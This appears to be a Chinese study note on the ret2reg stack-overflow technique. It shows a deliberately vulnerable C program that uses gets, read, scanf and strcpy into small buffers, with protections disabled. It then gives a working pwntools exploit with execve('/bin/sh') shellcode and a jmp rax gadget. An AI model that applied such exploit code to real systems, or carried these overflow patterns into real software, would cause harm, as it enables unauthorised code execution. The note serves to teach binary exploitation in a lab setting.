ret2reg 学习笔记

我们常常能覆盖返回地址，却苦于不知道shellcode的地址，这样即使覆盖了返回地址也是枉费心机

当我们看到以下几种情况的时候，就知道往往有栈溢出的出现了

//gcc hello.c  -no-pie -fno-stack-protector -z execstack -o hello

#include<stdio.h>
#include<unistd.h>
#include<string.h>

void vuln1(){
    char buf[0x40];
    read(0,buf,0x50);
}

void vuln2(){
    char buf[0x40];
    gets(buf);
}

void vuln3(){
    char buf[0x40];
    scanf("%s",buf);
}

void vuln4(char * str){
    char buf[0x40];
    strcpy(buf,str);
}

int main(){
    
    setbuf(stdin,0);
    setbuf(stdout,0);
    setbuf(stderr,0);
    
    //vuln1();
    vuln2();
    //vuln3();
    //vuln4("444444444444");

    return 0;
}

vuln1 2 3 4 分述了四种情况，当然还有更多的情况...

在ret的那一刻，我们想知道payload和寄存器到底有何牵连

 

对于 vuln1：

 rsi 存储着 payload的地址

 

对于vuln2：

rax、rdi 存储着payload的地址

 

对于vuln3：

 

 

在这些常见的寄存器里没有找到指向payload的

 

对于vuln4：

rax 存储着 payload 的地址

 

现在我们知道有许多寄存器指向payload，也就是说如果有类似 `jmp reg` 的指令，那就有可能在不知道shellcode地址的情况下，把程序的流程劫持到shellcode

 

以vuln2为例（需要注释掉对 vuln1 、vuln3 和 vuln4 的调用），采用如下命令编译：

　gcc hello.c  -no-pie -fno-stack-protector -z execstack -o hello

利用脚本如下：

from pwn import *
context(arch='amd64',os="linux")

sh=process("./hello")
#sh=gdb.debug("./hello")

shellcode=asm('''
mov rdi, 0x68732f6e69622f
push rdi
mov rdi,rsp
mov rsi,0
mov rdx,0
mov rax,0x3b
syscall
''')

jmp_rax=p64(0x400685)
payload=shellcode.ljust(0x48,b"\x00")+jmp_rax

sh.sendline(payload)

sh.interactive()

 

跟踪程序流程可以看到，程序运行了shellcode